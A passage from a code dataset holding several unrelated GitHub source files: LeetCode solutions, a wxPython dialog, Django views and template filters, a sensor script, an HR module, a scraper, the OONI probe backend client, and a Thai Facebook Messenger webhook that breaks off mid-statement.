https://leetcode.com/problems/n-ary-tree-level-order-traversal/\n\n\n# BFS, TC:O(N), SC:O(N)\ndef levelOrder(root: 'Node') -> List[List[int]]:\n    res = []\n    queue = [root]\n    while queue and root:\n        res.append([])\n        leafs = []\n        for node in queue:\n            res[-1].append(node.val)\n            if not node.children: continue\n            leafs.extend(node.children)\n        queue = leafs\n    return res","repo_name":"ychanc2104/LeetCode","sub_path":"N-ary Tree Level Order Traversal.py","file_name":"N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26744667227","text":"# coding: utf-8\nimport wx\n\nclass MyDialog(wx.Frame):\n\n    def __init__(self,parent,id,title):\n        wx.Frame.__init__(self,parent,id,title)\n        panel=wx.Panel(self,-1,size=(300,250))\n        wx.Button(panel,201,u'打开',pos=(70,100))\n        self.Centre()\n\n        wx.EVT_BUTTON(self,201,self.onOpen)\n\n    def onOpen(self,event):\n        dlg=wx.MessageDialog(None,u'你好,加油!',u'对话框',wx.YES_NO|wx.ICON_QUESTION)\n        res=dlg.ShowModal()\n        dlg.Destroy()\n\nif __name__=='__main__':\n    app=wx.App()\n    frame=MyDialog(None,-1,u'对话框示例1')\n    frame.Show()\n    
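# MainLoop() blocks here, dispatching GUI events until the frame is closed\n    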
app.MainLoop()\n","repo_name":"ganmk/python-prctice","sub_path":"py-wxpython弹出窗.py","file_name":"py-wxpython弹出窗.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32090455912","text":"from rest_framework import status\nfrom rest_framework.views import APIView\n\nfrom base.helpers.response import custom_response\nfrom products.models import Product, Stock\nfrom products.stock.serializers import StockSerializer\nfrom base.helpers.decorators import write_permissions\n\n\nclass CreateEditOrDelete(APIView):\n    @write_permissions\n    def post(self, request, **kwargs):\n        try:\n            data = request.data\n            data['product'] = Product.objects.get(pk=kwargs['pk'])\n\n            stock = Stock.objects.create(**data)\n\n            return custom_response(\n                message='Stock created successfully',\n                status=status.HTTP_201_CREATED,\n                data=StockSerializer(stock).data\n            )\n\n        except Exception as e:\n            return custom_response(\n                message=str(e),\n                status=status.HTTP_400_BAD_REQUEST\n            )\n\n    @write_permissions\n    def put(self, request, **kwargs):\n        try:\n            data = request.data\n            data['product'] = Product.objects.get(pk=kwargs['pk'])\n            stock = Stock.objects.edit(**data)\n\n            return custom_response(\n                message='Stock edited successfully',\n                status=status.HTTP_200_OK,\n                data=StockSerializer(stock).data\n            )\n\n        except Exception as e:\n            return custom_response(\n                message=str(e),\n                status=status.HTTP_400_BAD_REQUEST\n            )\n","repo_name":"calinvladth/history","sub_path":"2020/4_beauty_shop/server/products/stock/views/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8615587126","text":"import time\nimport board\nimport busio\nimport adafruit_lsm9ds1\nimport math\n\ni2c = busio.I2C(board.SCL, board.SDA)\nsensor = adafruit_lsm9ds1.LSM9DS1_I2C(i2c)\n\nwhile True:\n\taccel_x, accel_y, accel_z = sensor.acceleration\n\tmag_x, mag_y, mag_z = sensor.magnetic\n\tgyro_x, gyro_y, gyro_z = sensor.gyro\n\ttemp = sensor.temperature\n\n\tunit_accel_x, unit_accel_y, unit_accel_z = 0, 0, 0\n\taccel_magnitude = math.sqrt(accel_x**2 + accel_y**2 + accel_z**2)\n\tif accel_magnitude != 0:\n\t\tunit_accel_x = accel_x/accel_magnitude\n\t\tunit_accel_y = accel_y/accel_magnitude\n\t\tunit_accel_z = accel_z/accel_magnitude\n\n\troll = math.atan2(unit_accel_y, unit_accel_z) * 180/math.pi\n\tpitch = math.atan2((-unit_accel_x), math.sqrt(unit_accel_y**2 + unit_accel_z**2)) * 180/math.pi\n","repo_name":"kungminlin/ESCAL_Adafruit-LSM9DS1-RPi","sub_path":"condensed_lsm9ds1.py","file_name":"condensed_lsm9ds1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70095571368","text":"import operator\nfrom model import data_manager, util\nfrom typing import List\n# from datetime import date\n# from datetime import datetime\n\nDATAFILE = \"model/hr/hr.csv\"\nheaders = [\"Id\", \"Name\", \"Date of birth\", \"Department\", \"Clearance\"]\n\nYEARS_OLD = 0\nNAME_INDEX = 1\nDOB_INDEX = 2\nDEPARTMENT_INDEX = 3\nCLEARANCE_INDEX = 4\nCURRENT_YEAR = 2020\n\ndef get_employee():\n    read_table = data_manager.read_table_from_file(DATAFILE)\n    \n    return list(read_table)\n\ndef add_employee(arguments):\n    list_of_employes = get_employee()\n    Id = util.generate_id()\n    arguments[0] = Id\n    list_of_employes.append(arguments)\n    \n    new_list = 
data_manager.write_table_to_file(DATAFILE, list_of_employes)\n    return new_list\n\n\n\ndef update_element(index:int, index_options:int, new_info:str):\n    list_of_lists = get_employee()[1:] # read without the header row\n    list_of_lists[index][index_options] = new_info\n    data_manager.write_table_to_file(DATAFILE, list_of_lists)\n\n\ndef show_employee(date_id:str):\n    list_of_lists = get_employee()[1:] # read without the header row\n    for index, employee_list in enumerate(list_of_lists):\n        if date_id in employee_list: \n            return index, list_of_lists[index]\n\ndef delete_employee(index:int):\n    list_of_lists = get_employee()[1:]\n    del list_of_lists[index]\n    data_manager.write_table_to_file(DATAFILE, list_of_lists)\n\ndef convert_date(a):\n    return a\n    # return list(map(int,a.split(\"-\")))\n\ndef date_1(list_of_employee):\n    total_employee = get_employee()\n    employes_birth = []\n    for i in range(len(total_employee)):\n        a = total_employee[i][DOB_INDEX]\n        a = a.split(\"-\")\n        employes_birth.append(a)\n    return employes_birth\n","repo_name":"imarcins/ERP","sub_path":"SECURE ERP/model/hr/hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21245605244","text":"from lxml import html\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport win32api\r\n\r\nurl = 'https://news.google.com/topics/CAAqJggKIiBDQkFTRWdvSUwyMHZNRFp1ZEdvU0FtVnVHZ0pKVGlnQVAB?hl=en-IN&gl=IN&ceid=IN%3Aen'\r\n\r\npage = requests.get(url)\r\n\r\nsoup = BeautifulSoup(page.text, 'html.parser')\r\ntry:\r\n    # cricket_score = soup.find_all('div',class_='HEZHfd')[:2]\r\n    cricket_score = soup.find('div',class_='SOsZve').strings\r\n    score = ' '.join(list(cricket_score))\r\n    print(score)\r\n    win32api.MessageBox(0,score, 'Cricket Score', 0x00001000) \r\n    # print(len(cricket_score),type(cricket_score))\r\nexcept Exception as e:\r\n    print(e)\r\n    cricket_score = soup.find('div',class_='qCne4e').strings\r\n    print(' '.join(list(cricket_score)))\r\n\r\n","repo_name":"bethegiver2020/seProjects","sub_path":"cricket_score.py","file_name":"cricket_score.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42716561062","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter(name='has_group')\ndef has_group(user, group_name):\n    return user.groups.filter(name=group_name).exists()\n\n\n@register.filter(name='has_perm')\ndef has_perm(user, perm_name):\n    all_perms = user.get_all_permissions()\n    # print('Template Level has perms : ', has_perm)\n    # print('Template Level ALL perms : ', all_perms)\n    if perm_name in all_perms:\n        return True\n    else:\n        return False\n\n\n@register.filter(name='joinby')\ndef joinby(value, arg):\n    items = []\n    if value:\n        items = value.split(arg)\n    return items\n","repo_name":"njNafir/django-onepage","sub_path":"onepage/templatetags/group_perm.py","file_name":"group_perm.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898404967","text":"# https://leetcode.com/problems/permutations/\n# https://leetcode.com/problems/permutations/discuss/18296/Simple-Python-solution-(DFS).\nimport time\nfrom functools import wraps\n\ndef timing(func):\n    @wraps(func)\n    def time_count(*args, **kwargs):\n        t_start = time.time()\n        values = func(*args, **kwargs)\n        t_end = time.time()\n        
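# elapsed wall-clock time; @wraps above keeps func.__name__ pointing at the wrapped function for this report\n        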
print (f\"{func.__name__} time consuming: {(t_end - t_start):.3f} seconds\")\n return values\n return time_count\n\n\n# first thought, TC: O(N^N)\ndef permute(nums):\n n = len(nums)\n res = []\n def dfs(path):\n if len(path) == n:\n res.append(path)\n\n for num in nums:\n # prevent double arranging\n # O(n)\n if num not in path:\n # call n times\n dfs(path + [num])\n dfs([])\n return res\n\n\n# dfs, TC: O(N*(N!)^2), SC: O(N!) for recursive calls\ndef permute2(nums):\n n = len(nums)\n res = []\n def dfs(cands, path):\n if len(path)==n:\n res.append(path)\n return\n for i in range(len(cands)):\n # remove cands[i]\n # list slice, O(k)\n dfs(cands[:i] + cands[i+1:], path + [cands[i]])\n dfs(nums, [])\n return res\n\n# dfs, TC: O(N*N!), SC: O(N!) for recursive calls\ndef permute3(nums):\n n = len(nums)\n output = []\n def backtrack(first=0):\n # if all integers are used up\n if first == n:\n # copy nums, O(N)\n output.append(nums[:])\n for i in range(first, n):\n # place i-th integer first\n # in the current permutation\n nums[first], nums[i] = nums[i], nums[first]\n # use next integers to complete the permutations\n backtrack(first + 1)\n # backtrack\n nums[first], nums[i] = nums[i], nums[first]\n backtrack(0)\n return output\n\n# permute all combinations\ndef permute4(nums):\n res = []\n for i in range(1, len(nums)+1):\n coms = combine(nums, i)\n for com in coms:\n res.extend(permute3(com))\n return res\n\n# combinations\ndef combine(nums: list, k: int):\n res = []\n def backtrack(pos, path):\n if len(path) == k:\n # TC:O(k)\n res.append(path[:])\n # end\n return\n for i in range(pos, len(nums)):\n # add i+1 to path\n path.append(nums[i])\n # to next number\n backtrack(i + 1, path)\n # backtrack\n path.pop()\n backtrack(0, [])\n return res\n\nnums = [1,3,5,7,9,11,13,15]\n\ncom = combine([1,2,3], 3)\n\nres4 = permute4([1,2,3])\n\n@timing\ndef test(n=1000):\n for i in range(n):\n res = permute(nums)\n return res\n\n@timing\ndef test1(n=1000):\n for i in range(n):\n res = permute2(nums)\n return res\n\n@timing\ndef test2(n=1000):\n for i in range(n):\n res = permute3(nums)\n return res\n\nres = test(10)\nres1 = test1(10)\nres2 = test2(10)","repo_name":"ychanc2104/LeetCode","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7577322445","text":"import os\nimport json\n\nfrom urlparse import urljoin, urlparse\n\nfrom twisted.web.error import Error\nfrom twisted.web.client import Agent, Headers\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\n\nfrom twisted.python.versions import Version\nfrom twisted import version as _twisted_version\n_twisted_14_0_2_version = Version('twisted', 14, 0, 2)\n\nfrom ooni import errors as e, constants\nfrom ooni.settings import config\nfrom ooni.utils import log, onion\nfrom ooni.utils.net import BodyReceiver, StringProducer, Downloader\nfrom ooni.utils.socks import TrueHeadersSOCKS5Agent\n\n\ndef guess_backend_type(address):\n if address is None:\n raise e.InvalidAddress\n if onion.is_onion_address(address):\n return 'onion'\n elif address.startswith('https://'):\n return 'https'\n elif address.startswith('http://'):\n return 'http'\n else:\n raise e.InvalidAddress\n\nclass OONIBClient(object):\n def __init__(self, address=None, settings={}):\n self.base_headers = {}\n self.backend_type = settings.get('type', None)\n self.base_address = 
settings.get('address', address)\n        self.front = settings.get('front', '').encode('ascii')\n\n        if self.backend_type is None:\n            self.backend_type = guess_backend_type(self.base_address)\n        self.backend_type = self.backend_type.encode('ascii')\n\n        self.settings = {\n            'type': self.backend_type,\n            'address': self.base_address,\n            'front': self.front\n        }\n        self._setupBaseAddress()\n\n    def _setupBaseAddress(self):\n        parsed_address = urlparse(self.base_address)\n        if self.backend_type == 'onion':\n            if not onion.is_onion_address(self.base_address):\n                log.err(\"Invalid onion address.\")\n                raise e.InvalidAddress(self.base_address)\n            if parsed_address.scheme in ('http', 'httpo'):\n                self.base_address = (\"http://%s\" % parsed_address.netloc)\n            else:\n                self.base_address = (\"%s://%s\" % (parsed_address.scheme,\n                                                  parsed_address.netloc))\n        elif self.backend_type == 'http':\n            self.base_address = (\"http://%s\" % parsed_address.netloc)\n        elif self.backend_type == 'https':\n            self.base_address = (\"https://%s\" % parsed_address.netloc)\n        elif self.backend_type == 'cloudfront':\n            self.base_headers['Host'] = [parsed_address.netloc]\n            self.base_address = (\"https://%s\" % self.front)\n        self.base_address = self.base_address.encode('ascii')\n\n    def isSupported(self):\n        if self.backend_type in (\"https\", \"cloudfront\"):\n            if _twisted_version < _twisted_14_0_2_version:\n                log.err(\"HTTPS and cloudfronted backends require \"\n                        \"twisted > 14.0.2.\")\n                return False\n        elif self.backend_type == \"http\":\n            if config.advanced.insecure_backend is not True:\n                log.err(\"Plaintext backends are not supported. To \"\n                        \"enable at your own risk set \"\n                        \"advanced->insecure_backend to true\")\n                return False\n        elif self.backend_type == \"onion\":\n            # XXX add an extra check to ensure tor is running\n            if not config.tor_state and config.tor.socks_port is None:\n                return False\n        return True\n\n    def isReachable(self):\n        raise NotImplementedError\n\n    def _request(self, method, urn, genReceiver, bodyProducer=None, retries=3):\n        if self.backend_type == 'onion':\n            agent = TrueHeadersSOCKS5Agent(reactor,\n                                           proxyEndpoint=TCP4ClientEndpoint(reactor,\n                                                                            '127.0.0.1',\n                                                                            config.tor.socks_port))\n        else:\n            agent = Agent(reactor)\n\n        attempts = 0\n\n        finished = defer.Deferred()\n\n        def perform_request(attempts):\n            uri = urljoin(self.base_address, urn)\n            d = agent.request(method, uri, bodyProducer=bodyProducer,\n                              headers=Headers(self.base_headers))\n\n            @d.addCallback\n            def callback(response):\n                try:\n                    content_length = int(response.headers.getRawHeaders('content-length')[0])\n                except:\n                    content_length = None\n                response.deliverBody(genReceiver(finished, content_length))\n\n            def errback(err, attempts):\n                # We will recursively keep trying to perform a request until\n                # we have reached the retry count.\n                if attempts < retries:\n                    log.err(\"Lookup {} failed. Retrying.\".format(uri))\n                    attempts += 1\n                    perform_request(attempts)\n                else:\n                    log.err(\"Failed. 
Giving up.\")\n finished.errback(err)\n\n d.addErrback(errback, attempts)\n\n perform_request(attempts)\n\n return finished\n\n def queryBackend(self, method, urn, query=None, retries=3):\n log.debug(\"Querying backend {0}{1} with {2}\".format(self.base_address,\n urn, query))\n bodyProducer = None\n if query:\n bodyProducer = StringProducer(json.dumps(query))\n\n def genReceiver(finished, content_length):\n def process_response(s):\n # If empty string then don't parse it.\n if not s:\n return\n try:\n response = json.loads(s)\n except ValueError:\n raise e.get_error(None)\n if 'error' in response:\n log.debug(\"Got this backend error message %s\" % response)\n raise e.get_error(response['error'])\n return response\n\n return BodyReceiver(finished, content_length, process_response)\n\n return self._request(method, urn, genReceiver, bodyProducer, retries)\n\n def download(self, urn, download_path):\n\n def genReceiver(finished, content_length):\n return Downloader(download_path, finished, content_length)\n\n return self._request('GET', urn, genReceiver)\n\nclass BouncerClient(OONIBClient):\n def isReachable(self):\n return defer.succeed(True)\n\n @defer.inlineCallbacks\n def lookupTestCollector(self, net_tests):\n try:\n test_collector = yield self.queryBackend('POST', '/bouncer/net-tests',\n query={'net-tests': net_tests})\n except Exception as exc:\n log.exception(exc)\n raise e.CouldNotFindTestCollector\n\n defer.returnValue(test_collector)\n\n @defer.inlineCallbacks\n def lookupTestHelpers(self, test_helper_names):\n try:\n test_helper = yield self.queryBackend('POST', '/bouncer/test-helpers',\n query={'test-helpers': test_helper_names})\n except Exception as exc:\n log.exception(exc)\n raise e.CouldNotFindTestHelper\n\n if not test_helper:\n raise e.CouldNotFindTestHelper\n\n defer.returnValue(test_helper)\n\n\nclass CollectorClient(OONIBClient):\n def isReachable(self):\n # XXX maybe in the future we can have a dedicated API endpoint to\n # test the reachability of the collector.\n d = self.queryBackend('GET', '/invalidpath')\n\n @d.addCallback\n def cb(_):\n # We should never be getting an acceptable response for a\n # request to an invalid path.\n return False\n\n @d.addErrback\n def err(failure):\n failure.trap(Error)\n return failure.value.status == '404'\n\n return d\n\n def getInputPolicy(self):\n return self.queryBackend('GET', '/policy/input')\n\n def getNettestPolicy(self):\n return self.queryBackend('GET', '/policy/nettest')\n\n def createReport(self, test_details):\n request = {\n 'software_name': test_details['software_name'],\n 'software_version': test_details['software_version'],\n 'probe_asn': test_details['probe_asn'],\n 'probe_cc': test_details['probe_cc'],\n 'test_name': test_details['test_name'],\n 'test_version': test_details['test_version'],\n 'test_start_time': test_details['test_start_time'],\n 'input_hashes': test_details['input_hashes'],\n 'data_format_version': test_details['data_format_version'],\n 'format': 'json'\n }\n # import values from the environment\n request.update([(k.lower(),v) for (k,v) in os.environ.iteritems()\n if k.startswith('PROBE_')])\n\n return self.queryBackend('POST', '/report', query=request)\n\n def updateReport(self, report_id, serialization_format, entry_content):\n request = {\n 'format': serialization_format,\n 'content': entry_content\n }\n return self.queryBackend('POST', '/report/%s' % report_id,\n query=request)\n\n\n def closeReport(self, report_id):\n return self.queryBackend('POST', '/report/' + report_id + 
'/close')\n\nclass WebConnectivityClient(OONIBClient):\n    def isReachable(self):\n        d = self.queryBackend('GET', '/status')\n\n        @d.addCallback\n        def cb(result):\n            if result.get(\"status\", None) != \"ok\":\n                return False\n            return True\n\n        @d.addErrback\n        def err(_):\n            return False\n\n        return d\n\n    def control(self, http_request, tcp_connect,\n                http_request_headers=None,\n                include_http_responses=False):\n        if http_request_headers is None:\n            http_request_headers = {}\n        request = {\n            'http_request': http_request,\n            'tcp_connect': tcp_connect,\n            'http_request_headers': http_request_headers,\n            'include_http_responses': include_http_responses\n        }\n        return self.queryBackend('POST', '/', query=request)\n\n\ndef get_preferred_bouncer():\n    preferred_backend = config.advanced.get(\n        \"preferred_backend\", \"onion\"\n    )\n    bouncer_address = getattr(\n        constants, \"CANONICAL_BOUNCER_{0}\".format(\n            preferred_backend.upper()\n        )\n    )\n    if preferred_backend == \"cloudfront\":\n        return BouncerClient(\n            settings={\n                'address': bouncer_address[0],\n                'front': bouncer_address[1],\n                'type': 'cloudfront'\n            })\n    else:\n        return BouncerClient(bouncer_address)\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/backend_client.py","file_name":"backend_client.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"1777830348","text":"import random\n\nSECURE = True\n\n# Description\n'''\nIn this game, the goal is to guess a random number in as few attempts as possible.\n'''\n\ndef isValid(text):\n    text = text.lower()\n    if 'spiel' in text and ('zahl' in text or 'erraten' in text):\n        return True\n    else:\n        return False\n\ndef handle(text, tiane, local_storage):\n    if tiane.telegram_call:\n        zahl = random.randrange(1000)\n        tipp = 0\n        i = 0\n\n        tiane.say('Ok, lasse uns spielen. Versuche die Zufallszahl in möglichst wenigen Schritten zu erraten')\n\n        while tipp != zahl:\n            tiane.say('Dein Tipp:')\n            tipp = int(tiane.listen())\n\n            if zahl < tipp:\n                tiane.say(\"Die gesuchte Zahl ist kleiner als \" + str(tipp))\n            if zahl > tipp:\n                tiane.say(\"Die gesuchte Zahl ist größer als \" + str(tipp))\n            i += 1\n\n        tiane.say(\"Du hast die Zahl beim \" + str(i) + \". Tipp erraten! SUPER!\")\n\n    else:\n        tiane.say('Das Spiel kann leider nur über Telegram gespielt werden')\n","repo_name":"FerdiKr/TIANE","sub_path":"server/modules/guessNumberGame.py","file_name":"guessNumberGame.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"de","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"71214537767","text":"from django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom incident.views import incident, login\n\nclass TestUrls(SimpleTestCase):\n    def test_login_resolve(self):\n        url = reverse('login')\n        print(resolve(url))\n        self.assertEquals(resolve(url).func, login)\n\n\n    def test_incidents_resolve(self):\n        url = reverse('incidents')\n        print(resolve(url))\n        self.assertEquals(resolve(url).func, incident)","repo_name":"kamal-na/IncidentsReportSystem","sub_path":"incident_report/incident/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38678429897","text":"'''\nWritten By Ronel B. 
Llarenas\nGithub.com/llarenas\n'''\n\nimport threading\n\nclass Mymessenger(threading.Thread):\n\n def run(self): # kailan sang amo ni nga functin every thread, pwede man isulod ang init functin dri.\n for _ in range(10): #kung ayaw mglagay m ng letter var. pwede _ lng ilagay\n print(threading.currentThread().getName()) #threading code para mag thread r mag run ang thread class..\n\nx = Mymessenger(name='send ur messages \\n')\ny = Mymessenger(name='receive')\nx.start() #basta thread, start ibutang imbes na ang classname.\ny.start()\n","repo_name":"llarenas/basic-Python-programs-that-can-help-beginners","sub_path":"putathreadingding.py","file_name":"putathreadingding.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222382889","text":"class Solution:\n # @return a string\n def dfs(self, s, row, pos, nRows, d): # d = 0 means down, 1 means up\n if pos == len(s):\n return\n self.res[row].append(s[pos])\n if d == 0:\n d = 1 if row + 1 == nRows - 1 else 0\n self.dfs(s, row + 1, pos + 1, nRows, d)\n else:\n d = 0 if row - 1 == 0 else 1\n self.dfs(s, row - 1, pos + 1, nRows, d)\n \n def convert(self, s, nRows):\n self.res = []\n for i in range(nRows):\n self.res.append([])\n if nRows == 1:\n return s\n self.dfs(s, 0, 0, nRows, 0)\n s = ''\n for item in self.res:\n s += ''.join(item)\n return s","repo_name":"Shuaiyicao/leetcode-python","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7510293017","text":"# Module 7: Convolutional Neural Network (CNN)\n# Restore CNN Model\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nos.environ['TF_ENABLE_WINOGRAD_NONE_USED']='1'\n\nimport tensorflow as tf\n\n# Step 1: Restore Graph\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('./models/mnist_cnn/mnist_cnn.ckpt.meta')\nsaver.restore(sess,tf.train.latest_checkpoint('./models/mnist_cnn'))\n\n\n# Step 2: Restore Input and Output\ngraph = tf.get_default_graph()\nX = graph.get_tensor_by_name(\"X:0\")\nyhat = graph.get_tensor_by_name(\"yhat:0\")\n\n\n# Step 3: Evaluation\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"mnist\", one_hot=True,reshape=False,validation_size=0)\n\nX_test = mnist.test.images\ny_test = mnist.test.labels\n\nimport numpy as np\nindex = np.random.randint(1,10000)\nX_test = X_test[index:index+1]\n\nprint(\"Actual answer : \",sess.run(tf.argmax(y_test[index])))\nprint(\"Predicted answer : \",sess.run(tf.argmax(yhat,1), feed_dict={X: X_test}))\n\n","repo_name":"ianlaiky/DeepLearningTensorflowNew","sub_path":"exercises/module7_3_cnn_mnist_restore_model.py","file_name":"module7_3_cnn_mnist_restore_model.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40712446602","text":"from flask import Blueprint, request\nimport requests\nimport json\nfrom pymongo import MongoClient\nfrom ..config import develop as default_config\nfrom datetime import datetime\nimport PyICU\nimport random\nfrom ..brain import function as function\n\nwebhook_blueprint = Blueprint('webhook', __name__)\nmongo = MongoClient('mongodb://db:27017')\n\nuser = mongo.db.users\n\ngreeting_dialog = ['สวัสดี','หวัดดี','ทักทาย','Hello','Greeting','ไง','hi']\ngreeting_ans_dialog_first = ['เมี๊ยว ยินดีที่ได้รู้จักนะคุณ ', 'เมี๊ยว 
สวัสดีคุณ ', 'เมี๊ยว ดีใจจังที่คุณ ']\ngreeting_ans_dialog_end = [' เหมียวสามารถช่วยคุณค้นหาโครงการได้นะ', ' เหมียวพร้อมช่วยคุณค้นหาโครงการแล้ว', ' ทักมาให้เหมียวเป็นตัวช่วยในการค้นหาโครงการ']\n\ndef send_message(sender_id, message_text):\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': {'text': message_text}\n }\n )\n )\n\n # print(r.json)\n return\n\ndef sendGeneric(sender_id, message_text):\n\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements':[{\n 'title':'TEST1',\n 'subtitle':'THIS_IS_PAGE_1',\n 'image_url':'',\n 'buttons':[{\n 'type':'web_url',\n 'url':'https://taejai.com/th/projects/all/',\n 'title':'เวปไซต์เทใจ'\n },{\n 'type':'postback',\n 'title':'ต้องการให้ช่วย',\n 'payload':'ค้นหา'\n }]\n }]\n }\n }\n }\n\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n\n return\n\ndef guideline(sender_id, message_text):\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements':[{\n 'title':'การใช้งานเบิ้องต้น',\n 'subtitle':'พิมพ์ ค้นหา เพื่อเริ่มต้นการค้นหาโครงการต่างๆ',\n 'image_url':'',\n 'buttons':[{\n 'type':'web_url',\n 'url':'https://taejai.com/th/projects/all/',\n 'title':'เวปไซต์เทใจ'\n },{\n 'type':'postback',\n 'title':'ค้นหาโครงการ',\n 'payload':'ค้นหา'\n }]\n }]\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return\n\ndef greeting(sender_id, message_text, doc):\n\n ranNum = random.randrange(len(greeting_ans_dialog_first))\n text = greeting_ans_dialog_first[ranNum]+doc['sender_name']+ greeting_ans_dialog_end[ranNum]\n\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'button',\n 'text':text,\n 'buttons':[{\n 'type':'postback',\n 'title':'ต้องการให้ช่วย',\n 'payload':'ค้นหา'\n }]\n }\n }\n }\n\n\n greeting_dict = ' เหมียวสามารถช่วยคุณค้นหาโครงการในเทใจได้นะ', ' เหมียวพร้อมช่วยคุณหาโครงการเสมอนะ', ' ทักมาให้เหมียวเป็นตัวช่วยในการค้นหาโครงงาน'\n # send_message(sender_id, 'เมี๊ยว สวัสดีคุณ'+doc['first_name']+' เหมียวสามารถช่วยคุณค้นหาโครงการในเทใจได้นะ')\n\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n print(r)\n # \"quick_replies\":[\n # {\n # \"content_type\":\"text\",\n # \"title\":\"\",\n # \"image_url\":\"http://example.com/img/red.png\",\n # \"payload\":\"\"\n # }\n # ]\n\n return\n\n@webhook_blueprint.route('/', methods=['GET'], strict_slashes=False)\ndef validate_webhook():\n if request.args.get('hub.verify_token', '') == default_config.FB_VERIFY_TOKEN:\n return request.args.get('hub.challenge', '')\n else:\n return 'Wrong validation token'\n\n\n@webhook_blueprint.route('/', methods=['POST'], strict_slashes=False)\ndef 
handle_message():\n data = request.get_json()\n if data and data['object'] == 'page':\n for entry in data['entry']:\n if 'messaging'not in entry:\n for postback_event in entry['standby']:\n sender_id = postback_event['sender']['id']\n message_text = postback_event['postback']['title']\n u = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n if u.count() > 0:\n for doc in u:\n if message_text.find('ค้นหา') != -1 or message_text.find('ต้องการให้ช่วย') != -1 or message_text.find('ค้นหาใหม่') != -1:\n searchProject(sender_id, message_text, doc)\n return ''\n for messaging_event in entry['messaging']:\n if messaging_event.get('message'):\n if messaging_event['sender']['id'] == '514129448794599':\n continue\n sender_id = messaging_event['sender']['id']\n message_text = messaging_event['message']['text']\n chatState = 0\n u = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n if u.count() > 0:\n for doc in u:\n words = tadkaam(message_text)\n for word in words:\n if word in greeting_dialog:\n greeting(sender_id, message_text, doc)\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' :chatState})\n return ''\n if message_text.find('ค้นหา') != -1 or message_text.find('ต้องการให้ช่วย') != -1 or message_text.find('ค้นหาใหม่') != -1:\n searchProject(sender_id, message_text,doc)\n elif doc['chatState'] == 1:\n searchProject(sender_id,message_text,doc)\n elif message_text.find('ช่วยเหลือ') != -1 or message_text.find('ทำไรได้บ้าง') != -1:\n guideline(sender_id, message_text)\n elif (message_text.find('หมา') != -1 or message_text.find('แมว') != -1) and (message_text.find('ป่วย') != -1 or message_text.find('อาหาร') != -1):\n send_message(sender_id, 